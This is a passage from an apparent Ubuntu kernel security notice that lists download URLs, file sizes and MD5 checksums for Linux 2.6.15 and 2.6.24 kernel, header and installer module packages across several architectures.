http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb
  Size/MD5:     8762 da11c1b27b852c13e054d4aec99b9f13
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb
  Size/MD5:    53636 e7c55e0573e7aabc1098bbe9d37c6910
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb
  Size/MD5:   130776 a254b737d82cd35230628f67effd60d3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb
  Size/MD5:    98432 f772e922c5ca1f3ea8249c702e72cc73
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb
  Size/MD5:    77184 1a3d5fed7e2593cd1e324e81e8f73fbc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb
  Size/MD5:  1768386 bba934fcf1768f4e6616783b67cc0cb6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb
  Size/MD5:    69570 672c7fe6f046dc6ec11486a62622ed26
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb
  Size/MD5:    11758 a86954df8c28e894e6849038aec6dd3e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb
  Size/MD5:    36008 fc0d3c2b5b263bcd9260dcb8a75cf2e3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb
  Size/MD5:   132566 75fad8a0bac352909402ff2b333fc917
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb
  Size/MD5:    38564 48aa028998c1382beeecf660aa5aac3a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb
  Size/MD5:   299114 f11e7eb80349e04b8f23d8a049f76b56

powerpc architecture (Apple Macintosh G3/G4/G5):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:    23724 2db2adaa57d92b7f48688f95179e15e0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:    25950 95c01793a23a24cbff49964e4b8c5585
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:    49326 ab284f2d44d7a2bbc5ea52e67f613b23
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:    51530 a600f307f0f91779acc5c1980c4c3223
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:     2308 4effd1e0af9c3f48e2243691eb8ff6be
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:     2482 a4633265ec8c02ba24ea472625a3a3ee
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:    40196 21e77905b68f5d3872662ab5948dfd94
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:    43758 e439eec68bed9e401fec40c0031434d3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:   112596 caf6e08a7b71ca1051b5d94c62029fe3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:   120666 feb6891c9b38bbcc0d58026e14e2a0f5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:    40850 d1933a4df097dba261b11bbae450cc95
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:    45958 17b93bb9695be9a7cc0cb8bdac26e767
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:    29032 6ca496a4614fc2f0bf880a9f0fdbcb35
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:    29900 538fd9bb6ec6ff9c1cb4c61506a2094e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:   211404 5d35841b61601520fa369d152d3bbd42
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:   225214 3866f620a880044623bbc963a1b15f8f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:    45056 3fd6ac720a4053a1554c515dbdd60d09
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:    40220 342eae2faccd8a8e8235ccbe7a118f44
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:     1936 6eb08d519ab2bf1a5f5fac6e0c832e6d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:     2200 a2f7579c4986495691a7b124fc34c7c0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:    80680 37cbcb404f7c6d42ddf270cb222d97a0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:    86078 ffb8b233eb68841688aa616f1880fcb7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:   111644 8d3233bee5a2d55582bda79b6bd22f1c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:   125774 b1d8fd5c48d3d50a25da84576e3b1c2e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:    53410 9737ace229facb52faba8819b39aaa4f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:    58474 c0dfc0546cd6a326e8e5372286147ebc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:   147772 5add6e71d59aa7b22544c89d236f1264
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:   161708 2e4eaeb64a8a149fe0e89a6aa32c4273
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:   317494 e1e4733d8591ebe9372fe88ed3f0c816
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:   287602 85599af30985f874baa2005e68247c8a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:   115854 b64bea5344a06582f592f8de8493fea0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:   116514 54a687f3c7d632b17400826c8358eec2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:  1924292 af79708a135129928126925812c5e985
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:  2447446 600b87a4f5376d7ed6685dde273d1ca6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-powerpc-smp_2.6.15-54.77_powerpc.deb
  Size/MD5:   873400 cdb7cb415d400e8e8e9d69fa6a21549d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-powerpc64-smp_2.6.15-54.77_powerpc.deb
  Size/MD5:   870866 7252b4b7c1a9b0d65e69939157d86e13
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-powerpc_2.6.15-54.77_powerpc.deb
  Size/MD5:   868624 fa84e5dae2ee6f9986de8772a1357e23
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54_2.6.15-54.77_powerpc.deb
  Size/MD5:  6946740 28fc20a94d95b0b8c02aca0708a74101
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-powerpc-smp_2.6.15-54.77_powerpc.deb
  Size/MD5: 22776364 389e45cbdd998fa7dafa1229f5737bcb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-powerpc64-smp_2.6.15-54.77_powerpc.deb
  Size/MD5: 23678834 ea0a1438c2b0a5334b7ac71407cbc868
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-powerpc_2.6.15-54.77_powerpc.deb
  Size/MD5: 22355382 18f2e503843c54824551f54d39b8b468
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:    17782 9933c39eaa26b6c5558399d461d6e4aa
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:    17380 4f213deee9b7c625c1fd48d88f048c6c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:   261268 d73545c9cef2251ad094e9e53f889421
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:   282478 b037d7889d3f63d86c3605c945f081dc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:   227640 d6a097d06e05da8ae4676497fe918633
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:   248884 ca8a5caa96f92834425d7ee4a48a95e2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:  1048444 f58af64355ebfa8d71973d7961285aea
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:  1048566 32f48ed1ee827656c9446c79d6802b99
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:  1737706 67f6c275ca396042f8613936eda72c97
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:  1877428 8d0bbebe4eb6e4bf964fb6f440af7789
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:   250878 c171495228a2d3f25a5dab6a1d46ffe5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:   233632 c6062b42d12fa38bc5fcb59261bfa528
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:    13026 e2a2a9c9c0a66e0f66e4971456becb07
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:    13526 6393b9447870a049537c64f1da8c0984
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:    84832 dafa241b2ba2792acc11ed92ebf58d8a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:    52194 9d681e1cde559db52f919d9a75da2987
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:    73908 1b9eea0eb286147c629a5eb6a737bf68
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:    85844 9d8a5108c045be78f3aa16ec41863d49
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:     6624 c39e697a9b25473e791b7668df4798d5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:     7064 02c208ead4772ebd6dfaa1ee19df56cf
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:    60376 b83d6031ce6298fd19869d5d29e3a0c4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:    70392 cbaee4dfd466a12dff0b9098baa8788d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:   128550 e4821e65980d609ef08066b2780a485a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:   157808 9a1b4e218e785ecef63b0406c5f9c8a5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:   108038 b472765900eaa08cc2cc54a2ae26d907
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:   126050 75623f4ca292e6d3fc2b6e00211f964b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:    87304 2ff71c1735a777692a08170ed726345b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:    93306 ee8b741bf1ee4f57a90da0ed2b6da7d8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:  2013972 dac2efef3ff9d6289b7309d57cb72745
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:  1988102 c8d45fc53efb2b9f324547fd06ae7409
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:   104106 14ccbc627fb90ae558e79b3833e5ba6b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:   115702 19934a14896949c68acbe6f4b6459b0a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:    12738 31ecc1891237ac01baa6d70fa55b2ffa
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:    14444 a638ce85cd817ffcd0316b798067af0b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:    39948 0fad0a28b3b61dbce21d2ab2d3e385ec
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:    41474 4c179c6570402716b5e16076ee359ff9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:   149308 d381b35191480574c053f931f5d4b838
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:   168034 937d9f0067d9c5b86f547355a759ce3a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:    42272 9adfaeeaeec83a69f60bba08b9f7029e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:    44880 8be844f59b2578d8b0b96df521ed2980
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:   320284 ed49feb1ad11dbe9eaebdf8e3b55aa14
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb
  Size/MD5:   324712 00dc7e4c517a8e77dbdbcd472560fd07

sparc architecture (Sun SPARC/UltraSPARC):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb
  Size/MD5:    50478 90ae6fcda7578bfc42fb227db6ed4a16
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb
  Size/MD5:     2362 81e28a5627bcd9793bdb3d7d66c808e0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb
  Size/MD5:    40332 bba6454e4e7a730fc19a71e9f177591b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb
  Size/MD5:   110530 ee2bc9880d4119adc01104c26f4c9b45
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb
  Size/MD5:    41186 22e3751924678d62633868c319ec33bb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb
  Size/MD5:   104238 f5357492d5c611bd51c4724b1b955972
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb
  Size/MD5:     7438 6e66a60e61009df9bc350cde8318fd0e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb
  Size/MD5:   149008 d39a3d71f7cdaa48f4603f0d40d7183d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb
  Size/MD5:  1711722 024c561786c0bfc1f337cc46a1a99842
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-sparc64-smp_2.6.15-54.77_sparc.deb
  Size/MD5:   772116 b88f78698771d7b662bd8f55da837860
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-sparc64_2.6.15-54.77_sparc.deb
  Size/MD5:   771542 ade51cbe986056b296fc493d071add8f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54_2.6.15-54.77_sparc.deb
  Size/MD5:  6963002 734ea162d7bdae6fa642fbb65fc4aefd
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-sparc64-smp_2.6.15-54.77_sparc.deb
  Size/MD5: 15009480 f11efad62b8121702c97f681aaeff50c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-sparc64_2.6.15-54.77_sparc.deb
  Size/MD5: 14829506 72058abf59e768b6e7a962a0f1765772
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb
  Size/MD5:     7422 0fa7e99c434b4c2e616b163473d2482d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb
  Size/MD5:   248670 395da4afc2eea6417478e5b9df10eac9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb
  Size/MD5:   212452 381c41cde8488c4b922e0d13250ac60d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb
  Size/MD5:  1048468 d00527551222987b228c1b3a236b33fa
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb
  Size/MD5:  1481892 c2a73def45b9c272b0f1b16b24072f74
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb
  Size/MD5:    10118 6c152d785d4130d9189dfc5562b2918d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb
  Size/MD5:    40180 bfdd5a38c85c337948efc354d5b52b1b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb
  Size/MD5:     9370 a6b288b0cddcba37aa113b6c6a82c1ac
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb
  Size/MD5:    61482 f6d84c317c95ca51e4a3a961edd4afbc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb
  Size/MD5:   163022 75d6fbd3830d3fa83a4a33087893230f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb
  Size/MD5:    64010 b2c069e1a9ab296b69db1c9d9347fdb5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb
  Size/MD5:  1235086 983bf44bbfed30448fc00b43e525a222
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb
  Size/MD5:    59354 ce272f6264ab0b9731c489358ffae596
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb
  Size/MD5:    37406 39fb3eb53208a1810ef284874296c3ac
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb
  Size/MD5:   280076 7716ed5dd3c520a43c3774a4e3633047

Updated packages for Ubuntu 8.04 LTS:

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-24.55.diff.gz
  Size/MD5:  4767049 a3e6ddfbd5081bb6e7535fcde2a3f609
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-24.55.dsc
  Size/MD5:     2219 ddc04a20e187b20a43a5cecc952e4b59
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24.orig.tar.gz
  Size/MD5: 59085601 e4aad2f8c445505cbbfa92864f5941ab

Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.24_2.6.24-24.55_all.deb
  Size/MD5:  4928644 067a5db90758e43f49badf44aadc2ae2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-24_2.6.24-24.55_all.deb
  Size/MD5:  8142948 27ced16bc9ee340f7d2e59c4d03d4175
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-kernel-devel_2.6.24-24.55_all.deb
  Size/MD5:    96898 a53b271582fb8cb0f8aa7a3e6ef32d02
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.24_2.6.24-24.55_all.deb
  Size/MD5: 46978434 5338ae19db39ce537ea7f81fbdfc4a62

amd64 architecture (Athlon64, Opteron, EM64T Xeon):

http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb
  Size/MD5:    28590 3b10ec843d4ca2b68122730e1a14b331
http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb
  Size/MD5:   224138 5ef7d9b5cad79f6e5b10f8a004ec5cf4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb
  Size/MD5:    52646 d4bf1babe03ceacbe09131b76a14b9cd
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb
  Size/MD5:    40622 8e880c89feeb75ddcb97eff9a1d2fb3c
